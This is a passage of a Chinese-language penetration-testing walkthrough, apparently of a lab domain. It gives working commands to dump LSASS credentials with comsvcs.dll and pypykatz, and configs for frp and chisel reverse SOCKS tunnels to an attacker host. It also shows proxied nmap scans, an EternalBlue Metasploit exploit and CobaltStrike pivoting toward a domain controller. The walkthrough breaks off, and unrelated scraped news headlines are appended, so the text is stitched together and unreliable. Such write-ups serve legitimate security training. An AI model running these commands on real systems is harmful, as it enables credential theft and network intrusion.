rundll32.exe C:\\windows\\System32\\comsvcs.dll MiniDump 500 C:\\temp\\lsass.dmp full

rundll32.exe C:\\windows\\System32\\comsvcs.dll MiniDump 500 C:\\windows\\temp\\lsass.dmp full

ls C:\\windows\\temp\\lsass.dmp

download C:\\windows\\temp\\lsass.dmp


lsass.dmp重命名为weblogic.dmp
pypykatz lsa minidump weblogic.dmp -o weblogic.txt

并没有发现预想中存在的密码 ， 所以下面换个其他的方法；



解密工具可以解密了；

至此 ， web服务器算是搞定了 ， 下面开始个人主机的渗透 。
个人主机永恒之蓝利用进入内网 ， 个人主机已经无法直接出网了 ， 需要搭建代理 。
frp代理
服务端
[common

bind_addr =192.168.223.138
bind_port =7000
token = Xa3BJf2l5enmN6Z7A8mv
[socks5

type = tcp
remote_port =7777
plugin = socks5

客户端
[common

server_addr = 192.168.223.138
server_port = 7000
token = Xa3BJf2l5enmN6Z7A8mv
[plugin_socks

type = tcp
remote_port = 7777
plugin = socks5

proxychains nmap -v -Pn -T3 -sV -n -sT --open -p
22122222222234523214451351395985212133891338963794
50514333306500052365900543215211099539958140993465
87870013899021194108088 10.10.20.7


这里还可以尝试下用chisel；
./chisel server -p 8000 --reverse
./chisel client 192.168.223.138:8000 R:8100:socks


在kali里设置好代理配置；

proxychains nmap --script smb-vuln* -p 445 -sT -Pn 10.10.20.7 -vvv

很明显了 ， 永恒之蓝；这里还是用frp代理 ， 通过msf来方便点 。
msf6 > setg Proxies socks5:192.168.223.138:7777
msf6 > setg ReverseAllowProxy true
msf6 > use exploit/windows/smb/ms17_010_eternalblue
msf6 > set payload windows/x64/meterpreter/bind_tcp
msf6 > set rhost 10.10.20.7
msf6 > run


成功拿下个人主机 ， 照例先抓下密码；

这里在介绍另一种抓取密码的思路 ， 在目标机抓取后拿回本地来解密分析 ， 在某些场合下会有奇效；

取回本地 ， minidump方式解开

查看结果；

为了后续方便 ， 我们可以用CobaltStrike来继续 ， 虽然msf和CS会话可以互通 ， 但我还是习惯直接种马后使用 。 这里web服务器已经提前在CS上反弹好了 ， 精华在于CS的中转功能 。
因为此 Win7 不出网 ， 随后只能通过 CobaltStrike 设置中转：
先创建中转监听器：



生成木马：利用msf上传并运行木马后机器上线；


信息收集一波；
可以看到个人主机后面还有2台机器 ， 分别是域控服务器和数据库服务器 。 在进行下一步渗透之前 ， 先需要把二级代理搭建好 。
二级代理搭建先看看frp如何搭建二级代理；
kali上配置服务端；

web服务器上配置；（一个服务端 ， 一个客户端）


个人主机上配置客户端；
扫描测试下；在用chisel搭建一个2级代理；

kali上配置服务端；
web服务器上配置客户端和服务端；
个人主机上配置客户端；扫描测试下；
proxychains nmap -sC -sV -F -sT -Pn 10.10.10.18 -vvv

数据库服务器这里先借助bloodhound来分析下域环境 ， 以确定下一步的渗透思路 ， 具体的安装及使用这里就不赘述了
到达域管理员的最短路径；

用户：redteam.red/sqlserver 允许委托OWA的cifs服务（DC控制器）

至此有了后续基本的渗透思路 ， 就是通过委派攻击拿下域控 ， 下面开始逐步实施；
根据之前端口扫描的结果 ， 做下信息收集；


结合我们已经取得的个人主机控制权 ， 首先当前进程是没有域管的 ， 所以暂且放弃令牌窃取：

• 李现与eStar队员合影并晒签名队服 称“感谢冠军战队的礼物”
• gen.g战队|3分钟卖出2亿元，骁龙8 Gen1+5000mAh，买到就是赚到
• gen.g战队|骁龙8 Gen1+120W超级闪充，起售价3999元，开卖1秒就破亿元
• gen.g战队|四款骁龙8 Gen1旗舰均已发布，是选择入手还是做等等党？
• 17战队|号称比肩RTX 3070Ti的Intel新独显又再推迟发布，OEM厂商已麻木
• gen.g战队|一大波骁龙8 Gen 1处理器手机发布，谁才是真正的性价比之王？
• 培训|新经济向各行业领域渗透，如何在职业培训中加快“数字步伐”？人社部回应
• 马桶|被低估了！智能马桶好用且健康但家庭渗透率太低：普及率不足5%
• gen.g战队|红米K50提前开始预热，卢伟冰透露3个关键，骁龙8Gen1还是有救的？
• gen.g战队|骁龙8 Gen1加持，小米12系列手机登顶安卓手机性能榜